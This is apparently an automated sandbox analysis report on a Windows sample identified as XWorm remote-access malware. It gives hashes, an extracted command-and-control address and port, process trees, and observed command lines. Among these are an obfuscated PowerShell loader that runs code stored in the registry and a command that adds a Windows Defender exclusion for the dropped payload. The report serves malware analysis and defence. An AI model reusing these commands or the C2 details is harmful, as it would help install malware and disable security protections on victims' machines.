Overview
overview
10Static
static
10fr2nnk.exe
windows10-1703-x64
10fr2nnk.exe
windows7-x64
10fr2nnk.exe
windows10-2004-x64
10fr2nnk.exe
windows11-21h2-x64
10grab.exe
windows10-1703-x64
10grab.exe
windows7-x64
7grab.exe
windows10-2004-x64
8grab.exe
windows11-21h2-x64
8m2zen.exe
windows10-1703-x64
7m2zen.exe
windows7-x64
7m2zen.exe
windows10-2004-x64
7m2zen.exe
windows11-21h2-x64
7winhlp32.exe
windows10-1703-x64
10winhlp32.exe
windows7-x64
10winhlp32.exe
windows10-2004-x64
10winhlp32.exe
windows11-21h2-x64
10Analysis
-
max time kernel
30s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
11-05-2024 09:52
Behavioral task
behavioral1
Sample
fr2nnk.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
fr2nnk.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
fr2nnk.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral4
Sample
fr2nnk.exe
Resource
win11-20240426-en
Behavioral task
behavioral5
Sample
grab.exe
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
grab.exe
Resource
win7-20240221-en
Behavioral task
behavioral7
Sample
grab.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral8
Sample
grab.exe
Resource
win11-20240508-en
Behavioral task
behavioral9
Sample
m2zen.exe
Resource
win10-20240404-en
Behavioral task
behavioral10
Sample
m2zen.exe
Resource
win7-20231129-en
Behavioral task
behavioral11
Sample
m2zen.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral12
Sample
m2zen.exe
Resource
win11-20240508-en
Behavioral task
behavioral13
Sample
winhlp32.exe
Resource
win10-20240404-en
Behavioral task
behavioral14
Sample
winhlp32.exe
Resource
win7-20240419-en
Behavioral task
behavioral15
Sample
winhlp32.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
winhlp32.exe
Resource
win11-20240419-en
General
-
Target
winhlp32.exe
-
Size
205KB
-
MD5
a83dc22ef14c6b5d96aaee00b10a4973
-
SHA1
ef84a5e12797487e7a4c1acaa9f783eda6cc77d5
-
SHA256
143e319ba8ca646021e2c90acc56ebb035612146b5c8c128214da52b1386e68d
-
SHA512
0662b2fb69f781f53333c71c3f6abbb581165457662c1f6667568b07828ee4b7b056caaff7dd1c1b857bc4bcf12743eae3489de2be426035498a82bd0caaeccc
-
SSDEEP
6144:y2q1XI3ttUUcmIN1EAr4SeBid/eedR19:lq143cUcB1pzP1Xd
Malware Config
Extracted
xworm
3.0
147.185.221.18:41012
-
Install_directory
%AppData%
-
install_file
Agent.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\System32\x4L.exe family_xworm behavioral14/memory/2684-22-0x0000000000CC0000-0x0000000000CD8000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2548 created 432 2548 powershell.EXE winlogon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2696 cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
x4L.exex4Shellcode.exepid process 2684 x4L.exe 2764 x4Shellcode.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ip-api.com -
Drops file in System32 directory 5 IoCs
Processes:
powershell.EXEwinhlp32.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\System32\x4L.exe winhlp32.exe File opened for modification C:\Windows\System32\x4L.exe winhlp32.exe File created C:\Windows\System32\x4Shellcode.exe winhlp32.exe File opened for modification C:\Windows\System32\x4Shellcode.exe winhlp32.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2548 set thread context of 2368 2548 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2700 timeout.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10b5dd2689a3da01 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.EXEdllhost.exepowershell.exepid process 2548 powershell.EXE 2548 powershell.EXE 2368 dllhost.exe 2368 dllhost.exe 2368 dllhost.exe 2368 dllhost.exe 1500 powershell.exe 2368 dllhost.exe 2368 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
winhlp32.exex4L.exepowershell.EXEdllhost.exesvchost.exepowershell.exedescription pid process Token: SeDebugPrivilege 2288 winhlp32.exe Token: SeDebugPrivilege 2684 x4L.exe Token: SeDebugPrivilege 2548 powershell.EXE Token: SeDebugPrivilege 2548 powershell.EXE Token: SeDebugPrivilege 2368 dllhost.exe Token: SeAuditPrivilege 856 svchost.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeAuditPrivilege 856 svchost.exe -
Suspicious use of WriteProcessMemory 50 IoCs
Processes:
winhlp32.execmd.exetaskeng.exepowershell.EXEdllhost.exex4L.exedescription pid process target process PID 2288 wrote to memory of 2684 2288 winhlp32.exe x4L.exe PID 2288 wrote to memory of 2684 2288 winhlp32.exe x4L.exe PID 2288 wrote to memory of 2684 2288 winhlp32.exe x4L.exe PID 2288 wrote to memory of 2764 2288 winhlp32.exe x4Shellcode.exe PID 2288 wrote to memory of 2764 2288 winhlp32.exe x4Shellcode.exe PID 2288 wrote to memory of 2764 2288 winhlp32.exe x4Shellcode.exe PID 2288 wrote to memory of 2764 2288 winhlp32.exe x4Shellcode.exe PID 2288 wrote to memory of 2696 2288 winhlp32.exe cmd.exe PID 2288 wrote to memory of 2696 2288 winhlp32.exe cmd.exe PID 2288 wrote to memory of 2696 2288 winhlp32.exe cmd.exe PID 2696 wrote to memory of 2700 2696 cmd.exe timeout.exe PID 2696 wrote to memory of 2700 2696 cmd.exe timeout.exe PID 2696 wrote to memory of 2700 2696 cmd.exe timeout.exe PID 768 wrote to memory of 2548 768 taskeng.exe powershell.EXE PID 768 wrote to memory of 2548 768 taskeng.exe powershell.EXE PID 768 wrote to memory of 2548 768 taskeng.exe powershell.EXE PID 2548 wrote to memory of 2368 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 2368 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 2368 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 2368 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 2368 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 2368 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 2368 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 2368 2548 powershell.EXE dllhost.exe PID 2548 wrote to memory of 2368 2548 powershell.EXE dllhost.exe PID 2368 wrote to memory of 432 2368 dllhost.exe winlogon.exe PID 2368 wrote to memory of 476 2368 dllhost.exe services.exe PID 2368 wrote to memory of 492 2368 dllhost.exe lsass.exe PID 2368 wrote to memory of 500 2368 dllhost.exe lsm.exe PID 2368 wrote to memory of 604 2368 dllhost.exe svchost.exe PID 2368 wrote to memory of 684 2368 dllhost.exe svchost.exe PID 2368 wrote to memory of 760 2368 dllhost.exe svchost.exe PID 2368 wrote to memory of 820 2368 dllhost.exe svchost.exe PID 2368 wrote to memory of 856 2368 dllhost.exe svchost.exe PID 2368 wrote to memory of 972 2368 dllhost.exe svchost.exe PID 2368 wrote to memory of 236 2368 dllhost.exe svchost.exe PID 2368 wrote to memory of 108 2368 dllhost.exe spoolsv.exe PID 2368 wrote to memory of 1052 2368 dllhost.exe svchost.exe PID 2368 wrote to memory of 1116 2368 dllhost.exe taskhost.exe PID 2684 wrote to memory of 1500 2684 x4L.exe powershell.exe PID 2684 wrote to memory of 1500 2684 x4L.exe powershell.exe PID 2684 wrote to memory of 1500 2684 x4L.exe powershell.exe PID 2368 wrote to memory of 1176 2368 dllhost.exe Dwm.exe PID 2368 wrote to memory of 1208 2368 dllhost.exe Explorer.EXE PID 2368 wrote to memory of 3052 2368 dllhost.exe svchost.exe PID 2368 wrote to memory of 2164 2368 dllhost.exe sppsvc.exe PID 2368 wrote to memory of 2096 2368 dllhost.exe wmiprvse.exe PID 2368 wrote to memory of 2684 2368 dllhost.exe x4L.exe PID 2368 wrote to memory of 768 2368 dllhost.exe taskeng.exe PID 2368 wrote to memory of 1500 2368 dllhost.exe powershell.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ba1e7860-a45d-4898-a225-de7608d7e8af}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {2231640F-02DF-4E81-8A7B-D92AD80B5E75} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('x4'+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\x4L.exe"C:\Windows\System32\x4L.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4L.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\x4Shellcode.exe"C:\Windows\System32\x4Shellcode.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1FC0.tmp.bat""3⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmp1FC0.tmp.batFilesize
160B
MD507db3304a4acb1f0e10138dee927b70b
SHA1f71900ec7e7bcdb5e23984d6d7f408ecc028c7aa
SHA256b0a806a474dbee5dce3519302899cc2e10f2530de7a224416c4daaf0968c36d0
SHA51278cc693101f2c85d0f93d4e2294b9a3e98e3edb284e9f742d7f4bd770706b69a7b16068f55ad648a1bff5513a26982e13b2de778bb336f68587d132c35d20403
-
C:\Windows\System32\x4L.exeFilesize
68KB
MD59ecdf1a7818f7e9952b6041e3aa19b7a
SHA193a8357036356c1c1e20a5cf69fdbad877ce8a0f
SHA2560771bbea72ecea02dc0e9641cc91c039cccbcde0936716a6e3bc21b1203707e4
SHA512847651f0a8cd4c5b791de90ac5987ba1ba4eca87e72df479c6c8bfc526788d22bef7123f72864a1a91aa94437d47b22cc5159d83bca6a71e246dad12fd292853
-
C:\Windows\System32\x4Shellcode.exeFilesize
164KB
MD58a7bee2c8cec6ac50bc42fe03d3231e6
SHA1ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
SHA256c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
SHA51234370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5
-
memory/432-50-0x00000000004C0000-0x00000000004EC000-memory.dmpFilesize
176KB
-
memory/432-45-0x00000000004C0000-0x00000000004EC000-memory.dmpFilesize
176KB
-
memory/432-44-0x0000000000390000-0x00000000003B6000-memory.dmpFilesize
152KB
-
memory/432-42-0x0000000000390000-0x00000000003B6000-memory.dmpFilesize
152KB
-
memory/432-56-0x00000000004C0000-0x00000000004EC000-memory.dmpFilesize
176KB
-
memory/432-57-0x000007FEBFD90000-0x000007FEBFDA0000-memory.dmpFilesize
64KB
-
memory/432-58-0x0000000037B80000-0x0000000037B90000-memory.dmpFilesize
64KB
-
memory/476-84-0x000007FEBFD90000-0x000007FEBFDA0000-memory.dmpFilesize
64KB
-
memory/476-74-0x0000000000520000-0x000000000054C000-memory.dmpFilesize
176KB
-
memory/476-85-0x0000000037B80000-0x0000000037B90000-memory.dmpFilesize
64KB
-
memory/476-80-0x0000000000520000-0x000000000054C000-memory.dmpFilesize
176KB
-
memory/492-64-0x0000000000990000-0x00000000009BC000-memory.dmpFilesize
176KB
-
memory/492-72-0x0000000037B80000-0x0000000037B90000-memory.dmpFilesize
64KB
-
memory/492-71-0x000007FEBFD90000-0x000007FEBFDA0000-memory.dmpFilesize
64KB
-
memory/492-70-0x0000000000990000-0x00000000009BC000-memory.dmpFilesize
176KB
-
memory/500-88-0x0000000000860000-0x000000000088C000-memory.dmpFilesize
176KB
-
memory/1500-170-0x000000001B6E0000-0x000000001B9C2000-memory.dmpFilesize
2.9MB
-
memory/1500-171-0x0000000002080000-0x0000000002088000-memory.dmpFilesize
32KB
-
memory/2288-24-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmpFilesize
9.9MB
-
memory/2288-0-0x000007FEF6183000-0x000007FEF6184000-memory.dmpFilesize
4KB
-
memory/2288-2-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmpFilesize
9.9MB
-
memory/2288-1-0x0000000000880000-0x00000000008BA000-memory.dmpFilesize
232KB
-
memory/2368-38-0x0000000077A20000-0x0000000077B3F000-memory.dmpFilesize
1.1MB
-
memory/2368-39-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2368-36-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2368-37-0x0000000077B40000-0x0000000077CE9000-memory.dmpFilesize
1.7MB
-
memory/2368-31-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2368-32-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2368-33-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2368-34-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2548-30-0x0000000077A20000-0x0000000077B3F000-memory.dmpFilesize
1.1MB
-
memory/2548-29-0x0000000077B40000-0x0000000077CE9000-memory.dmpFilesize
1.7MB
-
memory/2548-28-0x00000000012F0000-0x000000000131A000-memory.dmpFilesize
168KB
-
memory/2548-27-0x0000000000360000-0x0000000000368000-memory.dmpFilesize
32KB
-
memory/2548-26-0x000000001A150000-0x000000001A432000-memory.dmpFilesize
2.9MB
-
memory/2684-22-0x0000000000CC0000-0x0000000000CD8000-memory.dmpFilesize
96KB
-
memory/2684-23-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmpFilesize
9.9MB
-
memory/2684-198-0x000007FEF6180000-0x000007FEF6B6C000-memory.dmpFilesize
9.9MB